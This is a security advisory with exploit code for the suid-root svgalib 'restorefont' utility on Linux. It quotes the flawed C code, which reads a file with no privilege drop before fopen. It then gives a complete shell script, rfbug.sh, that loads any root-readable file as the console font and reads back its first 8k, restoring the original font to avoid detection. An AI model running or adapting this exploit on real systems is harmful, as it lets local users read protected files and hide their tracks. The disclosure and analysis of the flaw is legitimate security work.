Linux 'restorefont' Security Holes

by FEH Staff

Linux's svgalib utilities, which must be installed suid root, have a problem:
they do not revoke suid permissions before reading a file. This is exploited
here in the restorefont utility, but similar bugs exist in other svgalib
utilities.

The restorefont utility serves two functions. First, it will read a font from
a file and write it to the console as the current font. Second, it will read
the current font from the console and write it out to a file. Luckily, the
specific bug in restorefont can only be exploited by someone at the console,
reducing its overall impact on the security of the system as a whole.

In writing the utilities, the authors were aware that suid permissions must
be given up before writing out the font; it is in fact commented as such in
the code. However, when reading in a font, the program is still running with
full suid root permissions. This lets us read in, as the "font", any file that
root could access (basically, anything).

The applicable code to read in the file is shown below:

    #define FONT_SIZE 8192

    unsigned char font[FONT_SIZE];

    if (argv[1][1] == 'r') {
        FILE *f;
        /* still effective uid root here: no privilege drop before fopen */
        f = fopen(argv[2], "rb");
        if (f == NULL) {
        error:
            perror("restorefont");
            exit(1);
        }
        if (1 != fread(font, FONT_SIZE, 1, f)) {
            if (errno)
                goto error;
            puts("restorefont: input file corrupted.");
            exit(1);
        }
        fclose(f);

We can see from this that the file to be read in has to be at least 8k; if it
is not, the program prints an error and exits. If the file is at least 8k, the
first 8k are read into the buffer, and the program proceeds to install
whatever the file contained as the font:

    vga_disabledriverreport();
    vga_setchipset(VGA);        /* avoid SVGA detection */
    vga_init();
    vga_setmode(G640x350x16);
    vga_puttextfont(font);
    vga_setmode(TEXT);

At this point the console will look quite unreadable if the file held
something other than a font. But the data that was put into the font is left
untouched, and is readable using the -w option of restorefont. We then read
the font back from video memory to a new file, and our job is complete: we
have read the first 8k of a file we shouldn't have had access to. To prevent
detection of having run this, we probably shouldn't leave an unreadable font
on the screen, so we save and later restore the original font around the read
from the file.

The complete exploit is shown below:

Program:                    restorefont, a svgalib utility
Affected Operating Systems: Linux
Requirements:               logged in at console
Security Compromise:        user can read first 8k of any file of at least
                            8k in size on local filesystems
Synopsis:                   restorefont reads a font file while suid root,
                            writing it to video memory as the current VGA
                            font; anyone at console can read the current
                            font to a file, allowing you to use video memory
                            as an 8k file buffer.

rfbug.sh:

    #!/bin/sh
    # usage: rfbug.sh <file to read> <output file>
    restorefont -w /tmp/deffont.tmp      # save the current console font
    restorefont -r "$1"                  # load the target file as the font
    restorefont -w "$2"                  # read it back out of video memory
    restorefont -r /tmp/deffont.tmp      # restore the original font
    rm -f /tmp/deffont.tmp
